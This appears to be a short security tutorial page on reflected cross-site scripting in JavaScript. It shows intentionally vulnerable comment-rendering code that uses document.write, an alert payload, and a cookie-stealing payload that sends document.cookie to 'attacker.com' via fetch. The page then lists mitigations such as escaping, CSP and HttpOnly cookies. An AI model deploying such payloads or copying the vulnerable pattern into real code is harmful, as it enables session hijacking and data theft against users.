top of page

An example of how cybersecurity bad actors can compromise Java script code

Scenario: Exploiting XSS Vulnerability in JavaScript

Vulnerable Code:

Imagine a web application where users can post comments. The backend renders the comments directly on a page without sanitizing input.

<!DOCTYPE html>
<html>
<head>
    <title>Comment Section</title>
</head>
<body>
    <h1>Leave a Comment</h1>
    <form method="GET" action="/comments">
        <input type="text" name="comment" placeholder="Write your comment here">
        <button type="submit">Submit</button>
    </form>
    
    <h2>Comments:</h2>
    <div id="comments">
        <!-- Vulnerable rendering of user input -->
        <script>
            const urlParams = new URLSearchParams(window.location.search);
            const comment = urlParams.get('comment');
            if (comment) {
                document.write('<p>' + comment + '</p>');
            }
        </script>
    </div>
</body>
</html>

Attack Scenario:

​

1. Input a Malicious Payload: An attacker submits the following "comment":

html

​

<script>alert('Hacked!');</script>

​

 

2. Result: When the page reloads, the malicious script is executed in the victim's browser, displaying an alert box. In a real attack,

     this could be replaced with code to steal cookies, session tokens, or sensitive user data.

Consequences of The Attack:

​

1. Session Hijacking: Malicious scripts can steal session cookies using:

     

         html

​

        Document.cookie

​​

​

 

​​Example payload:

​

        <script> fetch('https://attacker.com/steal?cookie=' + document.cookie); </script>

​​

​

2. Phishing or Defacement: An attacker might use JavaScript to modify the DOM and trick users into entering credentials into a fake

    login form.

3. Browser Exploits: Advanced attacks might leverage browser vulnerabilities to gain deeper access to the victim’s machine.

How to Mitigate:

​

  1. Escape User Input: Sanitize and escape special characters to prevent scripts from being executed. Use libraries like DOMPurify for sanitization.

        Example:

​

        javascript

​

        const safeComment = comment.replace(/</g, "&lt;").replace(/>/g, "&gt;");

        document.write('<p>' + safeComment + '</p>');

​

   2. Use Content Security Policy (CSP): Add a Content-Security-Policy HTTP header to restrict script execution:

​

       http

 

       Content-Security-Policy: default-src 'self'; script-src 'self';

​

   3. Avoid document.write: Use safer DOM manipulation methods like textContent or innerText to ensure no executable code is injected:

​

       javascript

​

       const p = document.createElement('p'); p.textContent = comment; // Safely adds text, no script execution

       document.getElementById('comments').appendChild(p);

​

   4. Validate Input on the Backend: Even if the front end escapes input, ensure the backend validates and sanitizes it before

       storing or  rendering.

​

   5. Use HTTP-Only Cookies: Prevent scripts from accessing session cookies by marking them as

       HttpOnly in the server's response headers:

​

       http

​

       Set-Cookie: session=abcd1234; HttpOnly; Secure

bottom of page